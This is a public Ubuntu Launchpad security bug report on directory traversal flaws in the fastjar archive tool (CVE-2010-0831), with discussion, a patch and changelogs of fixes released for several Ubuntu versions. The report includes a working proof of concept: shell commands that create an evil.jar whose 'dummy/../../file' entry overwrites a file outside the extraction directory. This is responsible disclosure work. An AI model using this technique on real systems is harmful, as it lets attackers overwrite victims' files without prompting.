Directory traversal vulnerabilities

Bug #540575 reported by Dan Rosenberg on 2010-03-17
260
This bug affects 1 person
Affects Status Importance Assigned to Milestone
fastjar (Ubuntu)
Medium
Marc Deslauriers
Hardy
Undecided
Unassigned
Jaunty
Undecided
Unassigned
Karmic
Undecided
Unassigned
Lucid
Undecided
Unassigned

Bug Description

Binary package hint: fastjar

The "fastjar" archive utility, installed on my Linux system as "/usr/bin/fastjar", is
vulnerable to directory traversal vulnerabilities. If an attacker can convince
a victim to extract a malicious .jar file, arbitrary files on disk may be
overwritten without prompting.

fastjar attempts to prevent directory traversal, presumably by checking if the
first several characters of a file included in the .jar archive are "../". For
example (my /usr/bin/jar is a symlink to fastjar):

=============================================

drosenbe@Dan:~/jar$ touch ../file
drosenbe@Dan:~/jar$ jar cvf evil.jar ../file
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: ../file (in=129) (out=93) (deflated 27%)
Total:
------
(in = 169) (out = 455) (deflated -169%)
drosenbe@Dan:~/jar$ jar -xvf evil.jar
   created: META-INF/
 extracted: META-INF/MANIFEST.MF
Traversal to parent directories during unpacking!

=============================================

However, this can be subverted by creating a dummy folder and traversing from
there, as follows:

=============================================

drosenbe@Dan:~/jar$ echo "This is an evil file" > ../file
drosenbe@Dan:~/jar$ mkdir dummy
drosenbe@Dan:~/jar$ jar cvf evil.jar dummy/../../file
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: dummy/../../file (in=21) (out=21) (deflated 0%)
Total:
------
(in = 61) (out = 401) (deflated -557%)
drosenbe@Dan:~/jar$ echo "This is a good file" > ../file
drosenbe@Dan:~/jar$ cat ../file
This is a good file
drosenbe@Dan:~/jar$ jar xvf evil.jar
 extracted: META-INF/MANIFEST.MF
  inflated: dummy/../../file
drosenbe@Dan:~/jar$ cat ../file
This is an evil file

=============================================

fastjar also allows the inclusion of full paths as file names, which will be
extracted and overwrite files without prompting. Archive programs such as jar
should take care to ensure that extracted contents remain in the current
directory and do not allow absolute paths or directory traversal, both of which
pose security vulnerabilities.

Please let me know if you have any trouble reproducing this issue or any
questions. I have confirmed that Sun's release of the "jar" utility is also vulnerable
to these issues, and I have contacted their security team.

Marc Deslauriers (mdeslaur) wrote :

Incomplete fix for CVE-2006-3619?

Dan Rosenberg (dan-j-rosenberg) wrote :

This does appear to be an incomplete fix for the above issue, but the unpacking of absolute paths seems to be new (and also dangerous).

Kees Cook (kees) on 2010-04-09
Changed in fastjar (Ubuntu):
status: New → Confirmed
importance: Undecided → Medium
Dan Rosenberg (dan-j-rosenberg) wrote :

I've attached a fix for both issues. I've tested the fix thoroughly, confirmed it does not break functionality, and made sure it resolves the vulnerability, even when doing all sorts of tricks with "." and ".." entries in the path of a file added to a .jar archive.

Kees Cook (kees) wrote :

CVE-2010-0831, current CRD is 2010-05-25

Kees Cook (kees) on 2010-06-06
visibility: private → public
tags: added: patch
Changed in fastjar (Ubuntu):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in fastjar (Ubuntu Hardy):
status: New → Confirmed
Changed in fastjar (Ubuntu Lucid):
status: New → Confirmed
Changed in fastjar (Ubuntu Jaunty):
status: New → Confirmed
Changed in fastjar (Ubuntu Karmic):
status: New → Confirmed
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.98-1ubuntu0.10.04.1

---------------
fastjar (2:0.98-1ubuntu0.10.04.1) lucid-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
    - jartool.c (add_file_to_jar): Fix write return value check.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:20:03 -0400

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.98-1ubuntu0.9.10.1

---------------
fastjar (2:0.98-1ubuntu0.9.10.1) karmic-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
    - jartool.c (add_file_to_jar): Fix write return value check.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:23:57 -0400

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.97-3ubuntu0.1

---------------
fastjar (2:0.97-3ubuntu0.1) jaunty-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
    - jartool.c (add_file_to_jar): Fix write return value check.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:35:33 -0400

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.95-1ubuntu2.1

---------------
fastjar (2:0.95-1ubuntu2.1) hardy-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:37:54 -0400

Changed in fastjar (Ubuntu Hardy):
status: Confirmed → Fix Released
Changed in fastjar (Ubuntu Jaunty):
status: Confirmed → Fix Released
Changed in fastjar (Ubuntu Karmic):
status: Confirmed → Fix Released
Changed in fastjar (Ubuntu Lucid):
status: Confirmed → Fix Released
Changed in fastjar (Ubuntu):
status: Confirmed → Fix Released
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers